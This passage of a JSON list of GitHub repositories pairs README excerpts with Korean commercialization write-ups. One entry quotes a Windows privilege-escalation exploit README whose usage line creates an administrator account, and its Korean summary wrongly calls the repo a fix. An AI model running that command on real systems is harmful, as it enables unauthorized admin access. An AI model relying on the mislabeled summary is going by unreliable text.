기술 트렌드를 빠르게 따라잡고 싶은 사람들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: AI 논문을 자동으로 요약하고 검색하는 웹 플랫폼으로 구독료 수익화\n- **내부 업무 도구**: 기업의 AI 연구팀이 최","readme_excerpt":"# Must-Read Papers on Pre-trained Language Models (PLMs)\n\nContributed by [Xiaozhi Wang](https://bakser.github.io/) and [Zhengyan Zhang](https://github.com/zzy14).\n\n## Introduction\n\nPre-trained Languge Model (PLM) has achieved great success in NLP since 2018. In this repo, we list some representative work on PLMs and show their relationship with a diagram. Feel free to distribute or use it! [Here](https://github.com/thunlp/PLMpapers/blob/master/PLMfamily.pptx) you can get the source PPT file of the diagram if you want to use it in your presentation.\n\n![PLMfamiily](PLMfamily.jpg)\n\nCorrections and suggestions are welcomed.\n\n## Open PLMs\n\nWe keep training and releasing large-scale PLMs in recent years, which are listed as follows. Welcome to try them. \n\n1. **CPM-2**. Cost-Effective Pre-trained Language Models, 2021. [[Model&Code](https://github.com/TsinghuaAI/CPM-2)]\n2. **CPM-1**. Chinese Pre-trained Language Model, 2020. [[Model&Code](https://github.com/TsinghuaAI/CPM-Generate)] [[Paper](","composite_score":0.5175,"license_safety_tag":"safe"},{"name":"DingXiaoH/RepVGG","github_url":"https://github.com/DingXiaoH/RepVGG","stars":6,"language":"Python","license":"MIT","abandonment_months":40,"description":"# RepVGG 상용화 분석\n\n## 왜 보물인가\n사진이나 영상을 빠르고 정확하게 인식하는 인공지능 모델로, 스마트폰부터 산업용 카메라까지 다양한 기기에서 실시간으로 동작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **제조업 품질 검사 SaaS**: 공장의 생산 라인에서 불량품을 자동으로 감지하는 클라우드 기반 모니터링 서비스\n2. **보안 카메라 분","readme_excerpt":"# RepVGG: Making VGG-style ConvNets Great Again (CVPR-2021) (PyTorch)\n\n## Highlights (Sep. 1st, 2022)\n\nRepVGG and the methodology of re-parameterization have been used in **YOLOv6** ([paper](https://arxiv.org/abs/2209.02976), [code](https://github.com/meituan/YOLOv6))  and **YOLOv7** ([paper](https://arxiv.org/abs/2207.02696), [code](https://github.com/WongKinYiu/yolov7)). \n\nI have re-organized this repository and released the RepVGGplus-L2pse model with 84.06% ImageNet accuracy. Will release more RepVGGplus models in this month.\n\n## Introduction\n\nThis is a super simple ConvNet architecture that achieves over **84% top-1 accuracy on ImageNet** with a VGG-like architecture! This repo contains the **pretrained models**, code for building the model, training, and the conversion from training-time model to inference-time, and **an example of using RepVGG for semantic segmentation**.\n\n[The MegEngine version](https://github.com/megvii-model/RepVGG)\n\n[TensorRT implemention with C++ API by @up","composite_score":0.5175,"license_safety_tag":"safe"},{"name":"trexminer/T-Rex","github_url":"https://github.com/trexminer/T-Rex","stars":6,"language":"","license":"unknown","abandonment_months":35,"description":"# T-Rex 저장소 분석\n\n## 왜 보물인가\n암호화폐 채굴에 최적화된 소프트웨어로, 채굴자들이 더 많은 수익을 얻을 수 있게 해주는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **채굴 풀 운영 플랫폼**: 소규모 채굴자 커뮤니티를 위한 채굴 관리 SaaS 서비스\n2. **하드웨어 판매사 연계 도구**: GPU/채굴기 판매 회사의 고객 지원 내부 시","readme_excerpt":"# T-Rex NVIDIA GPU miner (Ethash / Etchash / Autolykos2 / Kawpow / Blake3 / Octopus / Firopow)\n\n## Overview\n\nT-Rex is a versatile cryptocurrency mining software. It supports a variety of algorithms and we, as developers, are trying to do our best to make it as fast and as convenient to use as possible.\n\nDeveloper fee is 1% (2% for Octopus, Autolykos2, and their dual mining modes).\n\n## FAQ\n\nSee https://github.com/trexminer/T-Rex/wiki/FAQ\n\n## Usage\n\nFull list of command line options:\n```\n    -a, --algo                     Specify the hash algorithm to use.\n                                   autolykos2\n                                   blake3\n                                   etchash\n                                   ethash\n                                   firopow\n                                   kawpow\n                                   mtp\n                                   mtp-tcr\n                                   multi\n                                   octopus\n               ","composite_score":0.5174,"license_safety_tag":"unknown"},{"name":"cs231n/gcloud","github_url":"https://github.com/cs231n/gcloud","stars":500,"language":"Python","license":"unknown","abandonment_months":62,"description":"# cs231n/gcloud 저장소 분석\n\n## 왜 보물인가\n구글 클라우드 환경에서 인공지능 강의(CS231N)를 실습할 수 있도록 만든 교육용 인프라로, 복잡한 설정 없이 누구나 AI를 배울 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 SaaS**: 대학이나 온라인 학습 플랫폼에서 구독형 AI 실습 환경 제공\n2. **기업 ","readme_excerpt":"# Google Cloud Setup and Tutorial\n\n(Last Update on April 7, 2021)\n\n\n# Table of contents\n\n1. [Overview](#overview)\n2. [Create and Configure Your Account](#create-and-configure-your-account)\n    1. [Sign Up GCP for the First Time](#sign-up-gcp-for-the-first-time)\n    2. [Configure Your Project](#configure-your-project)\n3. [Claim CS231N GCP credits](#claim-cs231n-gcp-credits)\n4. [Request an Increase in GPU Quota](#request-an-increase-in-gpu-quota)  \n    1. [Why don't I See Any GPU-related Quota](#why-dont-i-see-any-gpu-related-quota)\n5. [Set Up Google Cloud VM Image](#set-up-google-cloud-vm-image)\n    1. [Customize VM Hardware](#customize-vm-hardware)\n    2. [Configure Networking](#configure-networking)\n6. [Access Your Newly created VM](#access-your-newly-created-vm)\n    1. [Install gcloud command-line Tools](#install-gcloud-command-line-tools)\n7. [Remote Server Development](#remote-server-development)\n    1. [Using Jupyter Notebook with Google Compute Engine](#using-jupyter-notebook-with","composite_score":0.5174,"license_safety_tag":"unknown"},{"name":"wanglu1209/WFlutterDemo","github_url":"https://github.com/wanglu1209/WFlutterDemo","stars":500,"language":"Dart","license":"Apache-2.0","abandonment_months":71,"description":"# WFlutterDemo 사업화 분석\n\n## 왜 보물인가\n스마트폰 앱을 만드는 기술을 배우고 공유하는 오픈소스로, 5백 명 이상이 학습 자료로 활용하고 있어 교육 수요가 입증되었습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 초보자를 위한 모바일 앱 개발 온라인 교육 플랫폼 (월 구독제)\n2. **내부 업무 도구**: 회사의 개발팀 신입","readme_excerpt":"# WFlutterDemo\n\n公众号 「Flutter 笔记」文章 Demo\n\n**找「仿微信聊天弹出框」的同学，可以去 [fluttercandies/w_popup_menu](https://github.com/fluttercandies/w_popup_menu) 里寻找。**\n\n**现在也可以通过pub 来添加依赖了，具体可以查看 [pub: w_popup_menu](https://pub.dev/packages/w_popup_menu)**\n\n目前更新的文章有：\n\n- [Flutter SafeArea - 异形屏适配利器](https://github.com/wanglu1209/WFlutterDemo/blob/master/wx_demo_project/lib/safe_area_page.dart)\n- [Flutter AnimatedContainer 自带特效的Widget你见过没有？](https://github.com/wanglu1209/WFlutterDemo/blob/master/wx_demo_project/lib/animated_container_page.dart)\n- [Flutter FutureBuilder 异步UI神器](https://github.com/wanglu1209/WFlutterDemo/blob/master/wx_demo_project/lib/future_builder_page.dart)\n- [Flutter BackdropFilter 实现高斯模糊](https://github.com/wanglu1209/WFlutterDemo/blob/master/wx_demo_project/lib/back_drop_filter_page.dart)\n- [Dart基础知识](https://mp.weixin.qq.com/s/fSxWdvP7a5EfEEGsJPp7lA)\n- [Flutter 手势处理 & Hero 动画](https://github.com/wanglu1209/WFlutterDemo/blob/master/wx_demo_project/lib/hero_page.dart)\n- [Flutter 滑动删除最佳实践","composite_score":0.5174,"license_safety_tag":"safe"},{"name":"lin-123/javascript","github_url":"https://github.com/lin-123/javascript","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":25,"description":"# lin-123/javascript 분석 보고서\n\n## 왜 보물인가\n웹 개발에 필요한 JavaScript 코드 모음으로, 개발자들이 반복적인 작업을 빠르게 처리할 수 있게 해주는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 애플리케이션 개발 플랫폼에서 사용자가 쉽게 기능을 추가할 수 있는 코드 라이브러리로 제공\n2. ","readme_excerpt":"# Airbnb JavaScript 风格指南() {\n\n*使用 JavaScript 最合理的方式*。\n\n> **注意**: 这个指南假定你正在使用 [Babel](https://babeljs.io)，并且需要你使用 [babel-preset-airbnb](https://npmjs.com/babel-preset-airbnb) 或与其等效的预设。同时假定你在你的应用里安装了 带有 [airbnb-browser-shims](https://npmjs.com/airbnb-browser-shims) 或与其等效的插件的 `shims/polyfills`。\n\n[![Downloads](https://img.shields.io/npm/dm/eslint-config-airbnb.svg)](https://www.npmjs.com/package/eslint-config-airbnb)\n[![Downloads](https://img.shields.io/npm/dm/eslint-config-airbnb-base.svg)](https://www.npmjs.com/package/eslint-config-airbnb-base)\n[![Gitter](https://badges.gitter.im/Join Chat.svg)](https://gitter.im/airbnb/javascript?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n\n这个指南支持的其他语言翻译版请看 [Translation](#translation)。\n\n其他风格指南：\n - [ES5 (已废弃)](https://github.com/airbnb/javascript/tree/es5-deprecated/es5)\n - [React](react/)\n - [CSS-in-JavaScript](css-in-javascript/)\n - [CSS & Sass](https://github.com/airbnb/css)\n - [Ruby](https://github.com/airbnb/ruby)\n\n## 目录\n\n- [Airbnb Jav","composite_score":0.5174,"license_safety_tag":"safe"},{"name":"rip1s/CVE-2018-8120","github_url":"https://github.com/rip1s/CVE-2018-8120","stars":500,"language":"C++","license":"GPL-3.0","abandonment_months":97,"description":"# CVE-2018-8120 저장소 분석\n\n## 왜 보물인가\n윈도우 운영체제의 보안 허점을 해결하는 방법을 공개한 저장소로, 보안 전문가들이 시스템 방어 방법을 배우고 개선하는 데 500개 이상의 스타를 받을 정도로 가치 있는 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 점검 SaaS**: 기업 컴퓨터에서 이 취약점이 있는지 자동으로 검사해주는 온","readme_excerpt":"# CVE-2018-8120\nCVE-2018-8120 Windows LPE exploit\n\nSupports both x32 and x64.\n\nTested on: Win7 x32, Win7 x64, Win2008 x32, Win2008 R2 x32, Win2008 R2 Datacenter x64, Win2008 Enterprise x64.\n\n![image](https://github.com/unamer/CVE-2018-8120/blob/master/screenshot.bmp)\n\n## Usage\n```shell\nCVE-2018-8120 exploit by @unamer(https://github.com/unamer)\nUsage: exp.exe command\nExample: exp.exe \"net user admin admin /ad\"\n```\n## Caution\n* Please exclude shellcode.asm if you wanna compile x32 version.\n\n## Reference\n* https://xiaodaozhi.com/exploit/156.html\n* https://github.com/bigric3/cve-2018-8120\n","composite_score":0.5174,"license_safety_tag":"restricted"},{"name":"benanne/kaggle-galaxies","github_url":"https://github.com/benanne/kaggle-galaxies","stars":498,"language":"Python","license":"BSD-3-Clause","abandonment_months":143,"description":"# benanne/kaggle-galaxies 상용화 분석\n\n## 왜 보물인가\n우주의 은하 사진을 자동으로 분류하는 AI 기술로, 천문학 연구와 우주 탐사 산업에서 방대한 데이터를 빠르게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **천문대 SaaS 서비스**: 관측한 은하 사진을 자동 분류해주는 웹 플랫폼으로 연구자들에게 월 구독료 판매\n2. ","readme_excerpt":"kaggle-galaxies\n===============\n\nWinning solution for the Galaxy Challenge on Kaggle (http://www.kaggle.com/c/galaxy-zoo-the-galaxy-challenge).\n\nDocumentation about the method and the code is available in `doc/documentation.pdf`. Information on how to generate the solution file can also be found below.\n\n## Generating the solution\n\n### Install the dependencies\n\nInstructions for installing Theano and getting it to run on the GPU can be found [here](http://deeplearning.net/software/theano/install.html). It should be possible to install NumPy, SciPy, scikit-image and pandas using `pip` or `easy_install`. To install pylearn2, simply run:\n\n```\ngit clone git://github.com/lisa-lab/pylearn2.git\n```\n\nand add the resulting directory to your `PYTHONPATH`.\n\n**The optional dependencies listed in the documentation don't have to be installed to reproduce the winning solution**: the generated data files are already provided, so they don't have to be regenerated (but of course you can if you want to). I","composite_score":0.5173,"license_safety_tag":"safe"},{"name":"LearningOS/rust-rustlings-2024-autumn-rustlings-rust-rustlings-2024-autumn-template-1","github_url":"https://github.com/LearningOS/rust-rustlings-2024-autumn-rustlings-rust-rustlings-2024-autumn-template-1","stars":14,"language":"Rust","license":"MIT","abandonment_months":20,"description":"","readme_excerpt":"","composite_score":0.5172,"license_safety_tag":"safe"},{"name":"0voice/dpdk_engineer_manual","github_url":"https://github.com/0voice/dpdk_engineer_manual","stars":5,"language":"","license":"unknown","abandonment_months":25,"description":"# DPDK Engineer Manual 분석\n\n## 왜 보물인가\n네트워크 장비와 인터넷 속도를 다루는 기업들이 복잡한 기술을 쉽게 배울 수 있도록 정리한 실전 가이드이기 때문입니다.\n\n## 어디에 쓸 수 있나\n1. **네트워크 성능 진단 SaaS**: 기업의 인터넷 속도가 느린 이유를 자동으로 찾아주는 온라인 서비스\n2. **통신사 내부 교육 도구**: ","readme_excerpt":"# ✨✨✨【DPDK工程师手册】 —— 官方文档，最新视频，开源项目，论文，大厂内部ppt，知名工程师一览表\n\n<div  align=center>\n \n![image](https://user-images.githubusercontent.com/87457873/130548465-5d217b0a-2d0d-4692-a13f-9aaebdaeceb5.png)\n \n## —— 冲破内核瓶颈，让I/O性能飙升。\n \n书籍电子版资料 |官方文档 |最新视频 | 大会ppt| 开源项目|论文|知名工程师\n:-------: | :---------------: | :------------: | :-------: |:--------------: | :------------: | :------------:\n[📕](https://github.com/0voice/dpdk_engineer_manual#-%E4%B9%A6%E7%B1%8D%E7%94%B5%E5%AD%90%E7%89%88%E8%B5%84%E6%96%99)|[📜](https://github.com/0voice/dpdk_engineer_manual#-%E5%AE%98%E6%96%B9%E6%96%87%E6%A1%A3)|[📀](https://github.com/0voice/dpdk_engineer_manual#-%E6%9C%80%E6%96%B0%E8%A7%86%E9%A2%91)|[🎞](https://github.com/0voice/dpdk_engineer_manual#-%E5%A4%A7%E4%BC%9Appt)|[🏗](https://github.com/0voice/dpdk_engineer_manual#-%E5%BC%80%E6%BA%90%E9%A1%B9%E7%9B%AE)|[📰](https://github.com/0voice/dpdk_engineer_manual#-%E8%AE%BA%E6%96%87)|[👷](https://github.com/0voice/dpdk_engineer_manual#-%E7%9F%A5%E5%90%8D%E5%B7%A5%E7%A8%8B%E5%B8%","composite_score":0.5172,"license_safety_tag":"unknown"},{"name":"hwalsuklee/tensorflow-mnist-VAE","github_url":"https://github.com/hwalsuklee/tensorflow-mnist-VAE","stars":499,"language":"Python","license":"unknown","abandonment_months":111,"description":"# TensorFlow MNIST VAE 상용화 분석\n\n## 왜 보물인가\n손글씨 숫자를 자동으로 인식하고 새로운 숫자를 만들어내는 AI 기술로, 문서 자동화·이미지 생성 등 다양한 분야에 즉시 적용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n1. **우편물 자동 분류 SaaS**: 은행·물류회사에 월 구독 서비스로 제공하여 우편번호 자동 인식\n2. **이미지","readme_excerpt":"# Variational Auto-Encoder for MNIST\nAn implementation of variational auto-encoder (VAE) for MNIST descripbed in the paper:  \n* [Auto-Encoding Variational Bayes](https://arxiv.org/pdf/1312.6114) by Kingma et al.\n\n## Results\n### Reproduce\nWell trained VAE must be able to reproduce input image.  \nFigure 5 in the paper shows reproduce performance of learned generative models for different dimensionalities.  \nThe following results can be reproduced with command:  \n```\npython run_main.py --dim_z <each value> --num_epochs 60\n``` \n\n<table align='center'>\n<tr align='center'>\n<td> Input image </td>\n<td> 2-D latent space </td>\n<td> 5-D latent space </td>\n<td> 10-D latent space </td>\n<td> 20-D latent space </td>\n</tr>\n<tr>\n<td><img src = 'results/input.jpg' height = '150px'>\n<td><img src = 'results/dim_z_2.jpg' height = '150px'>\n<td><img src = 'results/dim_z_5.jpg' height = '150px'>\n<td><img src = 'results/dim_z_10.jpg' height = '150px'>\n<td><img src = 'results/dim_z_20.jpg' height = '150px'>\n</t","composite_score":0.5171,"license_safety_tag":"unknown"},{"name":"PaddlePaddle/PaddleGAN","github_url":"https://github.com/PaddlePaddle/PaddleGAN","stars":12,"language":"Python","license":"Apache-2.0","abandonment_months":23,"description":"# PaddleGAN 상업화 분석\n\n## 왜 보물인가\n사진이나 영상을 마치 손으로 그린 그림처럼 변환하거나, 흐릿한 이미지를 선명하게 만드는 등 '이미지 마법'을 누구나 쉽게 사용할 수 있는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 사진 편집 SaaS 서비스**\n- 일반인도 전문가 수준의 사진 보정을 할 수 있는 웹/앱 서비스 (예: 저화","readme_excerpt":"\nEnglish | [简体中文](./README_cn.md)\n\n# PaddleGAN\n\nPaddleGAN provides developers with high-performance implementation of classic and SOTA Generative Adversarial Networks, and supports developers to quickly build, train and deploy GANs for academic, entertainment and industrial usage.\n\nGAN-Generative Adversarial Network, was praised by \"the Father of Convolutional Networks\"  **Yann LeCun (Yang Likun)**  as **[One of the most interesting ideas in the field of computer science in the past decade]**. It's the one research area in deep learning that AI researchers are most concerned about.\n\n<div align='center'>\n  <img src='./docs/imgs/ppgan.jpg'>\n</div>\n\n[![License](https://img.shields.io/badge/license-Apache%202-red.svg)](LICENSE)![python version](https://img.shields.io/badge/python-3.6+-orange.svg)\n\n## 🎪 Hot Activities\n\n- 2021.4.15~4.22\n\n  GAN 7 Days Course Camp: Baidu Senior Research Developers help you learn the basic and advanced GAN knowledge in 7 days!\n\n  **Courses videos and related ma","composite_score":0.517,"license_safety_tag":"safe"},{"name":"tbl00c/iOSAppTemplate","github_url":"https://github.com/tbl00c/iOSAppTemplate","stars":500,"language":"Objective-C","license":"unknown","abandonment_months":118,"description":"# iOS 앱 템플릿 저장소 분석\n\n## 왜 보물인가\n아이폰 앱을 만들고 싶은 개발자들이 처음부터 코드를 짤 필요 없이 이미 만들어진 틀을 사용해 시간과 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **스타트업 앱 개발 회사**: 신규 프로젝트마다 이 템플릿을 기반으로 시작해 개발 기간을 50% 단축\n2. **기업 내부 도구**: 금융사","readme_excerpt":"# iOSAppTemplate\n高仿微信UI，着重点在于设置界面的抽象和IM界面。\n\n2016年重构版本：https://github.com/tbl00c/TLChat\n重构版本更新点：\n1、项目架构更改完善，将DB、网络、业务等封装并抽离。\n2、使通用类更加简单、合理。\n3、界面布局改用Masonry。\n4、在自学Python和Django，后期加入网络模块。\n5、更完善合理的整套IM方案（目标）。\n","composite_score":0.5169,"license_safety_tag":"unknown"},{"name":"Qihoo360/ArgusAPM","github_url":"https://github.com/Qihoo360/ArgusAPM","stars":10,"language":"Java","license":"Apache-2.0","abandonment_months":86,"description":"# Qihoo360/ArgusAPM 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱의 성능 문제를 자동으로 진단해주는 도구로, 앱 개발사들이 사용자 경험을 빠르게 개선할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 앱 개발사가 월 구독으로 자사 앱의 성능을 실시간 모니터링하는 클라우드 서비스\n2. **내부 업무 도구**: 대형 ","readme_excerpt":"<p align=\"center\">\n  <img alt=\"ArgusAPM Logo\" src=\"https://github.com/Qihoo360/ArgusAPM/blob/master/doc/img/readme/ArgusAPM.jpeg\" width=\"400\"/>\n</p>\n\n[![license](http://img.shields.io/badge/license-Apache2.0-brightgreen.svg?style=flat)](https://github.com/Qihoo360/ArgusAPM/blob/master/LICENSE)\n[![Release Version](https://img.shields.io/badge/release-3.0.1.1001-brightgreen.svg)](https://bintray.com/argusapm/argusapm/argus-apm-gradle-asm)\n\n**360开源又一力作——ArgusAPM移动性能监控平台**\n\n**公告**\n\n**由于公司业务调整及成本等原因，ArgusAPM停止支持服务端的免费接入服务。对于已经接入的产品不受影响（可以继续免费使用），只是不再新增了！\n本项目是个技术类的开源项目，停止服务端接入不会对开源项目本身产生影响，之前的接入文档大家也可以在自己项目里做参考。**\n\n**项目背景**\n\nArgusAPM是360手机卫士客户端团队继RePlugin之后开源的又一个重量级开源项目。ArgusAPM是360移动端产品使用的可视化性能监控平台，为移动端APP提供性能监控与管理，可以迅速发现和定位各类APP性能和使用问题，帮助APP不断的提升用户体验。\n\n\n**产品价值**\n\n- 实时掌控应用性能\n- 降低性能定位成本\n- 有效提升用户体验\n\n**监控模块**\n\nArgusAPM目前支持如下性能指标：\n\n- 交互分析：分析Activity生命周期耗时，帮助提升页面打开速度，优化用户UI体验\n- 网络请求分析：监控流量使用情况，发现并定位各种网络问题\n- 内存分析：全面监控内存使用情况，降低内存占用\n- 进程监控：针对多进程应用，统计进程启动情况，发现启动异常（耗电、存活率等）\n- 文件监控：监控APP私有文件大小/变化，避免私有","composite_score":0.5169,"license_safety_tag":"safe"},{"name":"ConsenSys-Academy/Blockchain-Developer-Bootcamp","github_url":"https://github.com/ConsenSys-Academy/Blockchain-Developer-Bootcamp","stars":8,"language":"CSS","license":"NOASSERTION","abandonment_months":26,"description":"# ConsenSys-Academy/Blockchain-Developer-Bootcamp 분석\n\n## 왜 보물인가\n블록체인 기술을 배우고 싶은 사람들을 위한 완성된 교육 커리큘럼으로, 기술 교육 사업화의 좋은 토대가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼(SaaS)**: 블록체인 초보자용 강의 구독 서비스로 월정액 방식의 ","readme_excerpt":"<h4 align=\"center\">Open-source version of ConsenSys Academy's Blockchain Developer Bootcamp</h4>\n\n<br>\n\n<p align=\"center\">\n  <a href=\"https://github.com/ConsenSys-Academy/Blockchain-Developer-Bootcamp/pulls\">\n    <img src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg?longCache=true\" alt=\"Pull Requests\">\n  </a>\n  <a href=\"LICENSE.md\">\n    <img src=\"https://img.shields.io/badge/license-CC--BY--NC--SA%204.0-lightgrey.svg?longCache=true\" alt=\"CC License\">\n  </a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://twitter.com/ConsenSysAcad\" target=\"_blank\">\n    <img src=\"https://img.shields.io/twitter/follow/ConsenSysAcad.svg?logo=twitter\">\n  </a>\n  <a href=\"https://discord.com/invite/consensys\" target=\"_blank\">\n    <img src=\"https://img.shields.io/discord/697535391594446898?color=green&label=discord&logo=discord\">\n  </a>\n</p>\n\n<div align=\"center\">\n  <sub>Created by\n  <a href=\"https://www.consensys.net\" target=\"_blank\">ConsenSys</a> and\n  <a href=\"https://github.com/ConsenSys-Academy/Bl","composite_score":0.5168,"license_safety_tag":"unknown"},{"name":"CyberSecurityUP/Guide-CEH-Practical-Master","github_url":"https://github.com/CyberSecurityUP/Guide-CEH-Practical-Master","stars":5,"language":"","license":"unknown","abandonment_months":32,"description":"# CyberSecurityUP/Guide-CEH-Practical-Master 분석\n\n## 왜 보물인가\n컴퓨터 해킹으로부터 조직을 지키는 방법을 체계적으로 배울 수 있는 실전 가이드로, 보안 전문가 자격증(CEH) 취득을 위한 실습 자료가 부족한 시장의 니즈를 정확히 채웁니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 교육 SaaS 플랫폼**: 기업 직","readme_excerpt":"# Guide-CEH-Practical-Master\n\n### **Exame Details**\n- Exam Title: Certified Ethical Hacker (Practical) \n- Number of Practical Challenges: 20 \n- Duration: 6 hours \n- Availability: Aspen – iLabs \n- Test Format: Cyber Range \n- Passing Score: Min 15 Questions\n--------------------------------------------\n**Exam Tips**\n- Vulnerability analysis to identify security loopholes in the target organization’s network, communication infrastructure, and end systems, etc;\n- System hacking, steganography;\n- Network scanning to identify live and vulnerable machines in a network;\n- OS banner grabbing, service, and user enumeration;\n- Different types of cryptography attacks;\n- SQL injection attacks;\n- Packet sniffing;\n- Computer Forensic;\n--------------------------------------------\n**Format**\n- Realized Test with Web Browser CyberQ\n- One ParrotOS to perform the pentest and Windows 11 Machine\n- Five machines to compromise on an isolated network from the internet\n- Search in Google? (Yes!)\n- Talk to someon","composite_score":0.5166,"license_safety_tag":"unknown"},{"name":"hampusohlsson/browser-deeplink","github_url":"https://github.com/hampusohlsson/browser-deeplink","stars":500,"language":"JavaScript","license":"MIT","abandonment_months":105,"description":"# Browser-Deeplink 분석 리포트\n\n## 왜 보물인가\n모바일 앱이나 웹사이트에서 사용자를 정확한 페이지로 바로 연결해주는 기술로, 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **전자상거래 플랫폼**: 광고 클릭 후 특정 상품 페이지로 즉시 이동하는 기능\n- **모바일 앱 마케팅**: 이메일이나 SNS 링크에서 앱의","readme_excerpt":"browser-deeplink\n================\n\n**‼️  Not maintained** - *Use at own risk*   \n\nRedirect your website users to your native Android and/or iOS app. If the user does not have the app, they are redirected to the corresponding app store page. \n\nSuch functionality is very common for apps like YouTube, Spotify etc. But it is not default functionality in mobile browsers today, and unnecessarily hard to implement. This plugin uses a workaround with a hidden `iframe` and `setTimeout()`.\n\nHow to use\n-\n\n### 1. Include browser-deeplink on your site.\n\n```html\n<script src=\"browser-deeplink.js\" type=\"text/javascript\"></script>\n```\n\nor\n\n```js\nrequire(\"./browser-deeplink\");\n```\n\n### 2. Provide your app details\n```js\ndeeplink.setup({\n    iOS: {\n        appName: \"myapp\",\n        appId: \"123456789\",\n    },\n    android: {\n        appId: \"com.myapp.android\"\n    }\n});\n```\n\nThis will create the following fallback app store links:\n\n**iOS:** `itms-apps://itunes.apple.com/app/myapp/id123456789?mt=8`    \n**Andr","composite_score":0.5166,"license_safety_tag":"safe"},{"name":"JasonMa0012/JasonMaToonRenderPipeline","github_url":"https://github.com/JasonMa0012/JasonMaToonRenderPipeline","stars":6,"language":"C#","license":"NOASSERTION","abandonment_months":37,"description":"# JasonMaToonRenderPipeline 분석 보고서\n\n## 왜 보물인가\n3D 영상 제작에서 만화 같은 독특한 화면 효과를 만들어주는 핵심 기술로, 게임과 영상 산업에서 큰 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 개발 SaaS**: 인디 게임 개발자들이 구독해서 사용하는 월간 렌더링 템플릿 서비스\n2. **영상 제작 API**","readme_excerpt":"# <img src=\"README.assets/JTRPLogoLow.png\" alt=\"img\" style=\"zoom: 80%;\" /> JTRP (Jason Ma Toon Render Pipeline)\n\n* [Works](#works)\n* [Installation](#installation)\n* [Getting Started：三渲二入门视频教程](#getting-started%E4%B8%89%E6%B8%B2%E4%BA%8C%E5%85%A5%E9%97%A8%E8%A7%86%E9%A2%91%E6%95%99%E7%A8%8B)\n* [Usages](#usages)\n    * [JTRP Custom Pass](#jtrp-custom-pass)\n    * [Pencil\\+ Outline 4 Unity](#pencil-outline-4-unity)\n  * [Material Parameters](#material-parameters)\n  * [Scripts](#scripts)\n  * [Real Time Style Transfer](#real-time-style-transfer)\n  * [DXR Sample (Removed)](#dxr-sample-removed)\n  * [Light Weight ShaderGUI](#light-weight-shadergui)\n  * [Model Outline Importer（Legacy）](#model-outline-importerlegacy)\n* [Future Works](#future-works)\n\n这是我业余时间开发的基于**Unity HDRP**并支持**DX12 RayTracing**的卡通渲染工具集，定位于实时生产**影视**级质量卡通渲染CG。\n\n基于UTS二次开发：https://github.com/unity3d-jp/UnityChanToonShaderVer2_Project\n\n专栏：https://www.zhihu.com/people/blackcat1312/posts\n\nB站：https://space.bilibili.com/42463206\n\n邮箱：131","composite_score":0.5166,"license_safety_tag":"unknown"},{"name":"ko1o/PYPhotoBrowser","github_url":"https://github.com/ko1o/PYPhotoBrowser","stars":6,"language":"Objective-C","license":"MIT","abandonment_months":78,"description":"# PYPhotoBrowser 상업화 분석\n\n## 왜 보물인가\n스마트폰으로 찍은 사진을 쉽게 정렬하고 보여주는 도구로, 사진이 많은 사람들의 일상 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 온라인 앨범 편집 플랫폼으로 어디서나 사진을 정렬하고 공유하는 서비스\n- **내부 업무 도구**: 부동산 중개소나","readme_excerpt":"# PYPhotoBrowser\n[![Build Status](https://travis-ci.org/iphone5solo/PYPhotoBrowser.svg?branch=master)](https://travis-ci.org/iphone5solo/PYPhotoBrowser)\n[![Pod Version](http://img.shields.io/cocoapods/v/PYPhotoBrowser.svg?style=flat)](http://cocoadocs.org/docsets/PYPhotoBrowser/)\n[![Pod Platform](http://img.shields.io/cocoapods/p/PYPhotoBrowser.svg?style=flat)](http://cocoadocs.org/docsets/PYPhotoBrowser/)\n[![Pod License](http://img.shields.io/cocoapods/l/PYPhotoBrowser.svg?style=flat)](https://opensource.org/licenses/MIT)\n\n- An easy way to browse photo(image) for iOS.\n- iOS 中使用简单的图片浏览器。\n\n## QQ chat room\n <img src=\"https://github.com/iphone5solo/learngit/raw/master/imagesForPhotosView/QQChatRoomForPYPhotoBrowser.jpg\" width=\"200\">\n\n## Contents\n* Getting Started\n  * [Renderings【效果图】](#效果图)\n  * [Who is using PYPhotoBrowser【哪些app使用PYPhotoBrowser】](#哪些app使用)\n  * [Status 【支持哪些状态】](#支持哪些状态)\n  * [Layouts【支持哪些布局】](#支持哪些布局)\n  * [Gestures【支持哪些手势】](#支持哪些手势)\n  * [What place will use this framework【","composite_score":0.5165,"license_safety_tag":"safe"},{"name":"simpletut/Universal-React-Apollo-Registration","github_url":"https://github.com/simpletut/Universal-React-Apollo-Registration","stars":499,"language":"JavaScript","license":"MIT","abandonment_months":70,"description":"# Universal-React-Apollo-Registration 분석\n\n## 왜 보물인가\n웹사이트에 회원가입 기능을 쉽게 추가할 수 있는 완성된 템플릿으로, 개발자가 처음부터 만드는 수고를 크게 덜 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 업무 관리 앱, 클라우드 저장소, 협업 도구 등에 즉시 적용 가능한 회원가입 시스템\n-","readme_excerpt":"# Open Source Universal User Registration System – NodeJS React Apollo GraphQL JWT MongoDB\n\n<p align=\"center\">\n    <img src=\"http://git-assets.react-starter-kit.com/logo.png\">  